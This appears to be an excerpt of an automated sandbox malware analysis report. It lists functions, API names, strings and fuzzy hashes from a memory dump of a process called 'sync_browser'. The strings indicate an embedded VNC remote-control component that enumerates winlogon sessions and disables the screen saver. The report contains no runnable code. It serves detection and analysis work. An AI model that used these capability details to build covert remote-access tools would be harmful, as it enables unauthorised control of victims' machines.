                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$CloseEnumFindInfoMessageOpenParametersPostSystemVersionWindowWindows
                                                                    • String ID: Screen-saver$WindowsScreenSaverClass$vncdesktop.cpp : KillScreenSaver...$vncdesktop.cpp : Killing ScreenSaver
                                                                    • API String ID: 1547096108-1130181218
                                                                    • Opcode ID: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
                                                                    • Instruction ID: 12d4906d1c43353b24e8e6eb955b66d1d22b22477235e65f9b38b71dee8fa221
                                                                    • Opcode Fuzzy Hash: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
                                                                    • Instruction Fuzzy Hash: 76316435A2869A81FA60DB21EC25BBD2354FF88744F844133D90EC2695DF3CE12BCB00
                                                                    Function 00007FF6DC0C4680 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc$CountCriticalInitializeSectionTick
                                                                    • String ID: 0$GetSystemTimes$NtQuerySystemInformation$kernel32.dll$ntdll.dll
                                                                    • API String ID: 649669561-4005017345
                                                                    • Opcode ID: eb4ac79b3cafd47dc512236d2ad93d7dd504d87db7fd05d4a85e566fa415a874
                                                                    • Instruction ID: be8bf6ee2dcf732f7b4697a8e0618221b2c4e6bd42eee3bc4cbb0726c6655ca5
                                                                    • Opcode Fuzzy Hash: eb4ac79b3cafd47dc512236d2ad93d7dd504d87db7fd05d4a85e566fa415a874
                                                                    • Instruction Fuzzy Hash: 64212C31A09B1982EB089F64FC4436C73E4FB48B94F444136D96D86394EF7CE566CB50
                                                                    Function 00007FF6DC0D8090 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 56synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalEventSection$EnterLeaveObjectResetSingleWait
                                                                    • String ID: c
                                                                    • API String ID: 295735435-112844655
                                                                    • Opcode ID: fa268cb6b2df6a727f3079fd17a88c909c0169f6597272d12e4c6e15257d5989
                                                                    • Instruction ID: 7788de42f3bae5248de271feb41884fa3e17f4ebe3d08e65ce82fdc0b946ebc7
                                                                    • Opcode Fuzzy Hash: fa268cb6b2df6a727f3079fd17a88c909c0169f6597272d12e4c6e15257d5989
                                                                    • Instruction Fuzzy Hash: F321FC25A18B55C3EA209F22F8941AE6374FB88B91F444132DB9E83B65DF3CE557C740
                                                                    Function 00007FF6DC0C47C0 Relevance: 18.3, APIs: 12, Instructions: 288COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$CountEnterLeaveTick
                                                                    • String ID:
                                                                    • API String ID: 1056156058-0
                                                                    • Opcode ID: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
                                                                    • Instruction ID: f053178b534d9faa6b6ca528d421d5456145ed7332fe05702a035bc0846a91e5
                                                                    • Opcode Fuzzy Hash: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
                                                                    • Instruction Fuzzy Hash: B4D13D76A19B4A8AEB14CF69E9402AC33E4FB58B88F405137DA4D83758DF3DE426C750
                                                                    Function 00007FF6DC0D0760 Relevance: 18.2, APIs: 12, Instructions: 181COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Combine$DataDeleteObjectRegion$free
                                                                    • String ID:
                                                                    • API String ID: 1378972593-0
                                                                    • Opcode ID: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
                                                                    • Instruction ID: 7fb9bcbb2dcd31ed9e5052c7d5eefe8aa2d6acb5e298e63590eb16841b14bd3b
                                                                    • Opcode Fuzzy Hash: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
                                                                    • Instruction Fuzzy Hash: 9C7190B6A0469586EB50CF2AE44066DBBA0F789BD4B44D132EF4D83B54CF3DD592CB40
                                                                    Function 00007FF6DC0DDA10 Relevance: 18.1, APIs: 12, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteObjectfree$CombineCriticalSection$CreateEnterLeaveRect
                                                                    • String ID:
                                                                    • API String ID: 707770685-0
                                                                    • Opcode ID: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
                                                                    • Instruction ID: 0a273fd2fabd82d45251f267aac6fa7a7688b93d8c0db4fb353e4da14350c705
                                                                    • Opcode Fuzzy Hash: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
                                                                    • Instruction Fuzzy Hash: 4B418F32608B45C6E750DB1AE8842AD7760FBC9BE0F540232EA9E837A5CF3DD516CB00
                                                                    Function 00007FF6DC0D09E0 Relevance: 18.1, APIs: 12, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Combine$DeleteObjectfree$CreateRect
                                                                    • String ID:
                                                                    • API String ID: 3143477926-0
                                                                    • Opcode ID: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
                                                                    • Instruction ID: 8a9b1348e03c3859aa156fc3fc8df7b482c9bcc624c3a6b8ab5dfcd001afd7c8
                                                                    • Opcode Fuzzy Hash: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
                                                                    • Instruction Fuzzy Hash: 7E41A172608A8A81DA50DB16E89446E7734FBCABE4F405133EE5E877A4CF3DD556C700
                                                                    Function 00007FF6DC0C55D0 Relevance: 18.0, APIs: 7, Strings: 5, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: sprintf$CriticalInitializeSection$_errno_invalid_parameter_noinfo
                                                                    • String ID: 0.0.0$12-12-2002$Plugin.dsm$Someone$Unknown
                                                                    • API String ID: 524037307-261918508
                                                                    • Opcode ID: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
                                                                    • Instruction ID: b3a6108bf221f6c29090125a8b0387a006e2f92357e5aa932735465f54c9b552
                                                                    • Opcode Fuzzy Hash: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
                                                                    • Instruction Fuzzy Hash: 8321ED32504B96D1D701DF24ED812EC73ECFF54B88F984136DA5C8A6A9DF7892A6C350
                                                                    Function 00007FF6DC0E6A3E Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 269COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close$DesktopHandle$CriticalInputLeaveOpenSection
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 4065787043-3977938048
                                                                    • Opcode ID: 91538cf79572d608c44060e02ed68d1d03b17946a78a771c52bf3acdc14f3e48
                                                                    • Instruction ID: c6884762f74210d1fcae0de713fe305ff19465baa45c14fb7d669c2f1fe516e8
                                                                    • Opcode Fuzzy Hash: 91538cf79572d608c44060e02ed68d1d03b17946a78a771c52bf3acdc14f3e48
                                                                    • Instruction Fuzzy Hash: D1E1D222A086D585F7548B65C8487FE27A9EB85B94F154237CB5CC73E5CF3AE462CB00
                                                                    Function 00007FF6DC0E5709 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 264COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$CloseInputOpen
                                                                    • String ID: disabled$enabled$vncclient.cpp : rfbSetServerInput: inputs %s$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 1367241101-2270697846
                                                                    • Opcode ID: edf9ddcd9a44aa48138f766378103f1c8a97073988da45d501d29b27bb572098
                                                                    • Instruction ID: f8282a3729ac4448d0767ed18528693ae43ac3d282bfb8f0cfa87c6bc297a4af
                                                                    • Opcode Fuzzy Hash: edf9ddcd9a44aa48138f766378103f1c8a97073988da45d501d29b27bb572098
                                                                    • Instruction Fuzzy Hash: 46D1E522A086D984FB50CB69C4587FE3BA9EB85B44F194137CA4CC77A1CF3AD466C700
                                                                    Function 00007FF6DC0D1A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 98libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: WTSEnumerateProcessesA$WTSFreeMemory$winlogon.exe$wtsapi32
                                                                    • API String ID: 145871493-4162899161
                                                                    • Opcode ID: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
                                                                    • Instruction ID: 1f7c0905bacd6bb432ea1f0e27abbbed4964328b6d45395a0e4b36f801290e13
                                                                    • Opcode Fuzzy Hash: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
                                                                    • Instruction Fuzzy Hash: A841B232609B4A96E6648F05E8402AD73A4FBC5BB0F550236DE6D83794EF3DE467CB00
                                                                    Function 00007FF6DC0F0700 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49threadsleepsynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ThreadWindow$CloseCurrentEventHandleMessageObjectOpenPostPrioritySingleSleepWait
                                                                    • String ID: VncEvent
                                                                    • API String ID: 2428488660-2681191898
                                                                    • Opcode ID: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
                                                                    • Instruction ID: 6d89f1f522977f51c8111f2517ee2a2375d456af13021b937b0ab48ef9c16aad
                                                                    • Opcode Fuzzy Hash: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
                                                                    • Instruction Fuzzy Hash: 4211A020F0C75B46FB549F22BE1437D2799EF89B88F089032C91EC2690DF2CA4A78700
                                                                    Function 00007FF6DC12C970 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
